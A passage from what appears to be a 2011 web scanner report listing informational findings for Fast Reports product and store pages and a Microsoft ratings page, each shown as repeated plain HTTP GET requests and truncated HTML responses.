X-Cnection: close
Date: Sat, 26 Mar 2011 12:23:26 GMT
Content-Length: 8227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d8ddabe6d0537f91904019" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="hidden_elem"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><div id="undo-wrap"><!--<label class="undo_button uiCloseButton uiCloseButtonSmall" for="u220644_1"><input title="Remove" type="button" id="u220644_1" /></label>--></div></div></td><td><div class="summary_text">80 people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">79</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"c3c21801",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:358385,vip:"66.220.158.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"X6eem",lhsh:"67144",tracking_domain:"http:\/\/pixel.facebook.com",ajaxpipe_enabled:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"F8mJ3":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/r
...[SNIP]...
18.9. http://www.fast-report.com/en/buy/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fast-report.com
Path:   /en/buy/

Request 1

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; expires=Tue, 05-Apr-2011 11:41:20 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A21; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>Fast Reports inc. store | Reports solutions for.net, winforms, asp.net, delphi - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/templates/ru/images/lightbox/lightbox-ico-loading.gif',
       imageBtnClose: '/
...[SNIP]...

Request 2

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:57 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A57; expires=Tue, 20-Mar-2012 11:41:57 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>Fast Reports inc. store | Reports solutions for.net, winforms, asp.net, delphi - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/templates/ru/images/lightbox/lightbox-ico-loading.gif',
       imageBtnClose: '/bitrix/templates/ru/images/lightbox/lightbox-btn-close.gif',
       imageBtnPrev: '/bitrix/templates/ru/images/lightbox/lightbox-btn-prev.gif',
       imageBtnNext: '/bitrix/templates/ru/images/lightbox/lightbox-btn-next.gif',
       imageBlank: '/bitrix/templates/ru/images/lightbox/lightbox-blank.gif',
       co
...[SNIP]...
18.10. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Request 1

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>Order FastReport..net - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/template
...[SNIP]...

Request 2

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:42:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:42:15 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A42%3A15; expires=Tue, 20-Mar-2012 11:42:15 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>Order FastReport..net - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/templates/ru/images/lightbox/lightbox-ico-loading.gif',
       imageBtnClose: '/bitrix/templates/ru/images/lightbox/lightbox-btn-close.gif',
       imageBtnPrev: '/bitrix/templates/ru/images/lightbox/lightbox-btn-prev.gif',
       imageBtnNext: '/bitrix/templates/ru/images/lightbox/lightbox-btn-next.gif',
       imageBlank: '/bitrix/templates/ru/images/lightbox/lightbox-blank.gif',
       containerResizeSpeed: 350,
       //txtImage: 'Screen',
       //tx
...[SNIP]...
18.11. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Request 1

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>FastReport..net download for free - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9
...[SNIP]...

Request 2

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:14 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A14; expires=Tue, 20-Mar-2012 16:32:14 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<title>FastReport..net download for free - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/templates/ru/images/lightbox/lightbox-ico-loading.gif',
       imageBtnClose: '/bitrix/templates/ru/images/lightbox/lightbox-btn-close.gif',
       imageBtnPrev: '/bitrix/templates/ru/images/lightbox/lightbox-btn-prev.gif',
       imageBtnNext: '/bitrix/templates/ru/images/lightbox/lightbox-btn-next.gif',
       imageBlank: '/bitrix/templates/ru/images/lightbox/lightbox-blank.gif',
       containerResizeSpeed: 350,
       //txtImage: 'Scre
...[SNIP]...
18.12. http://www.fast-report.com/en/products/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fast-report.com
Path:   /en/products/

Request 1

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:33 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:35 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A35; expires=Tue, 20-Mar-2012 11:41:35 GMT; path=/
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<meta name="keywords" content="keywordskeywords"><meta name="description" content="descriptiondescription"><title>Reporting software products for .net, delphi, c++Builder - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javasc
...[SNIP]...

Request 2

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:42:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:42:12 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A42%3A12; expires=Tue, 20-Mar-2012 11:42:12 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
<meta name="keywords" content="keywordskeywords"><meta name="description" content="descriptiondescription"><title>Reporting software products for .net, delphi, c++Builder - Fast Reports Inc.</title><link href="/bitrix/templates/en/styles.css" type="text/css" rel="stylesheet">
<link href="/bitrix/templates/en/template_styles.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/bitrix/templates/ru/lightbox.css" media="screen" />
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/templates/en/js/ddnmenu.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="/bitrix/js/jquery.lightbox-0.5.min.js"></script>
</head>

<body style="margin: 0" bgcolor="#B0B0B0" onClick="$('#lang-box').css({display: 'none'});">

<script type="text/javascript">
$(function() { // Select all links with lightbox class
   $('a.lightbox').lightBox({
       overlayBgColor: '#000000',
       overlayOpacity: 0.9,
       imageLoading: '/bitrix/templates/ru/images/lightbox/lightbox-ico-loading.gif',
       imageBtnClose: '/bitrix/templates/ru/images/lightbox/lightbox-btn-close.gif',
       imageBtnPrev: '/bitrix/templates/ru/images/lightbox/lightbox-btn-prev.gif',
       imageBtnNext: '/bitrix/templates/ru/images/lightbox/lightbox-btn-next.
...[SNIP]...
18.13. http://www.microsoft.com/library/gallery/components/ratingControl/ratings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.microsoft.com
Path:   /library/gallery/components/ratingControl/ratings.aspx

Request 1

GET /library/gallery/components/ratingControl/ratings.aspx?rurl=http%3a%2f%2fwww.microsoft.com%2ftechnet%2fsecurity%2fbulletin%2fms11-mar.mspx&l=en-us&frm=False&d=LTR&t=Microsoft+Security+Bulletin+Summary+for+March+2011 HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
